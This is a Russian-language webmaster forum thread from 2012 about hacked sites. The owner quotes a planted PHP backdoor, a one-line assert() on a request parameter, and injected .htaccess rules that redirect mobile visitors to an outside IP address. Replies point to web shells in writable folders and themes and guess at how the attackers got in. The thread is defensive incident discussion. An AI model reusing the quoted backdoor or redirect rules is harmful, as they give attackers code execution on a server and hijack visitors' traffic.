X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Вопрос ХАК гуру, Взломали сайт
webscs
webscs
Topic Starter сообщение 8.5.2012, 22:29; Ответить: webscs
Сообщение #1


Участник
***

Группа: User
Сообщений: 225
Регистрация: 3.6.2010
Из: Москва
Поблагодарили: 40 раз
Репутация:   8  


Добрый день форумчане, на некоторых моих сайтах, независимо от движка появилась такая бяка.

  1. Появился php файл phpinfo c Кодом - <?
    define('PHPSESSID',@assert($_REQUEST['PHPSESSID']))
    or phpinfo();
    ?>
  2. в файл .htaccess появились строки

    ###AB.PROTECTION###
    RewriteEngine on
    RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|blackberry|j2me|smartphone|series|phone|pocket|mobile|pda|
    psp|PPC|Android" [NC]
    RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
    RewriteCond %{HTTP_USER_AGENT} !america [NC]
    RewriteCond %{HTTP_USER_AGENT} !avant [NC]
    RewriteCond %{HTTP_USER_AGENT} !download [NC]
    RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
    RewriteRule ^(.*)$ httр://91[точка]224[точка]161[точка]175/go/1/[L,R=302]

    Если зайти с мобильных устройств, идет редирект на "httр://91[точка]224[точка]161[точка]175/go/1/"

    также в некоторых файлах строки вида

    ###BB.PROTECTION###
    RewriteEngine on
    RewriteBase /
    RewriteCond %{QUERY_STRING} ^(%2d|-)
    RewriteRule ^(.*)$ - [F]


Причем в логах с сайтов на wordpress инфы по error по нулям, на самописном

PHP Warning: include(inc/_conf_igur_ator.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in...... on line 2
PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'inc/_conf_igur_ator.php' for inclusion (include_path='.:/usr/local/php5/share/pear') in .... on line 2

может кто поможет, советом...

P.S. я в шоке как можно было разузнать имя фала конфига - _conf_igur_ator.php, подбором такое ведь не угадать

Сообщение отредактировал webscs - 8.5.2012, 22:31
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Informator
Informator
сообщение 8.5.2012, 23:34; Ответить: Informator
Сообщение #2


Новичок
*

Группа: User
Сообщений: 18
Регистрация: 4.4.2012
Из: Узбекистан
Поблагодарили: 7 раз
Репутация:   1  


(webscs @ 8.5.2012, 23:29) *
Добрый день форумчане, на некоторых моих сайтах, независимо от движка появилась такая бяка.


Причем в логах с сайтов на wordpress инфы по error по нулям, на самописном

PHP Warning: include(inc/_conf_igur_ator.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in...... on line 2
PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'inc/_conf_igur_ator.php' for inclusion (include_path='.:/usr/local/php5/share/pear') in .... on line 2

может кто поможет, советом...

P.S. я в шоке как можно было разузнать имя фала конфига - _conf_igur_ator.php, подбором такое ведь не угадать


Здравствуйте.
Файл конфига узнать не проблема, если на сайте залит шелл, а он залит, раз имеет полные права управлением апача. Ищите шелл, он где – есть однозначно. Проверяйте папки, которые имеют права на запись, такие как cache, uploads, templates.

Если можно несколько вопросов: Сайты, которые имеют такие коды, находятся на одном IP адресе?
Какие права доступа были прописаны на файл .htaccess раньше?
И еще можно ссылку на любой из сайтов, где таврится такая беда?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 8.5.2012, 23:41; Ответить: House
Сообщение #3


Завсегдатай
*****


Группа: Banned
Сообщений: 628
Регистрация: 2.11.2011
Из: Саранск
Поблагодарили: 154 раза
Репутация:   19  


А в чем собственно, проблема?
Удалите ненужный хлам из файлов. Проблема возможна в одной из cms.

Проверьте с какими правами был залит файл phpinfo.php.

(Informator @ 8.5.2012, 23:34) *
раз имеет полные права управлением апача.

Есть сотни способов обойти логирование апача без прав root.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Informator
Informator
сообщение 9.5.2012, 0:16; Ответить: Informator
Сообщение #4


Новичок
*

Группа: User
Сообщений: 18
Регистрация: 4.4.2012
Из: Узбекистан
Поблагодарили: 7 раз
Репутация:   1  


(House @ 9.5.2012, 0:41) *
А в чем собственно, проблема?
Удалите ненужный хлам из файлов. Проблема возможна в одной из cms.

Проверьте с какими правами был залит файл phpinfo.php.


Есть сотни способов обойти логирование апача без прав root.


Я с вами полностью согласен. Дыр много, особенно в новом Апаче.

Просто если у него сайты весят на одном айпи, код будет снова появляться. Ему нужно будет чистить все сайты на этом айпи, а потом просто латать дыры.

Злили скорей всего через Wordpress, безопасность у этих CMS не очень.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 9.5.2012, 0:59; Ответить: House
Сообщение #5


Завсегдатай
*****


Группа: Banned
Сообщений: 628
Регистрация: 2.11.2011
Из: Саранск
Поблагодарили: 154 раза
Репутация:   19  


(Informator @ 9.5.2012, 0:16) *
Злили скорей всего через Wordpress, безопасность у этих CMS не очень.

У дополнений и т.п. В движках нет уязвимостей, а если и есть, то они быстро латаются.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 9.5.2012, 2:33; Ответить: Electric
Сообщение #6


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


Ищите шеллы в темах. Если на аккаунте есть еще сайты - ищите в них.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BADbIk
BADbIk
сообщение 10.5.2012, 15:45; Ответить: BADbIk
Сообщение #7


Новичок
*

Группа: Viewer
Сообщений: 11
Регистрация: 10.5.2012
Поблагодарили: 4 раза
Репутация:   1  


Хостинг случайно не от РБК(hc.ru)? Обнаружил подобные изменения на одном из своих сайтов, судя по дате изменения были произведены вечером 7ого мая. В корне был создан файл phpinfo.php с приведенным выше содержимым, а .htaccess был заменен(!!!) на

(webscs @ 8.5.2012, 22:29) *
    ###BB.PROTECTION###
    RewriteEngine on
    RewriteBase /
    RewriteCond %{QUERY_STRING} ^(%2d|-)
    RewriteRule ^(.*)$ - [F]


Из-за замены хтакксесса перестало работать половину страниц сайта - так собственно я и заметил неладное. Отписал в службу поддержки - там ответили шаблоном, что типа ваш сайт был взломан, проверьте ваш компьютер антивирусом и тд..

Мне кажется, изменения были внесены самим персоналом хостинг-центра, так как эти изменения появились сразу же после публикации статьи про уязвимость на хабре http://habrahabr.ru/post/143331/ - в комментах писалось, что рбк уязвим на каких-то тарифах. Видимо они хотели быстро все исправить, но накосячили и ссылаются теперь на взломы.

Вариант со взломом у меня отпал, т.к. сайт почти статичный, за исключением пары скриптов с несколькими if - так что взламывать там нечего, если только не был взломан сам сервер. Логи тоже пустые. Хостинг покупался в 2008 году, так что скорее всего это был именно тот самый уязвимый тариф.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Вопрос по поводу цен на сайте
16 WildWeb8 957 13.5.2018, 17:40
автор: genjnat
Открытая тема (нет новых ответов) Вопрос к тем, кто зарабатывает на недвижимости?
Как заработать на недвижке.?
15 Dross 2764 26.4.2018, 18:26
автор: megachange
Открытая тема (нет новых ответов) SEO-Гуру 2018 - новое руководство от Dr.Max
Все секреты мобильного, регионального продвижения
0 AnnaYa 557 26.4.2018, 17:09
автор: AnnaYa
Открытая тема (нет новых ответов) Вопрос по сетке сайтов
Стоит ли так делать?
10 asskra 1441 12.4.2018, 22:33
автор: Ancitrus
Открытая тема (нет новых ответов) Вопрос по расингу контента
5 gold15 673 2.4.2018, 19:18
автор: mmkulikov


 



RSS Текстовая версия Сейчас: 27.5.2018, 13:46
Дизайн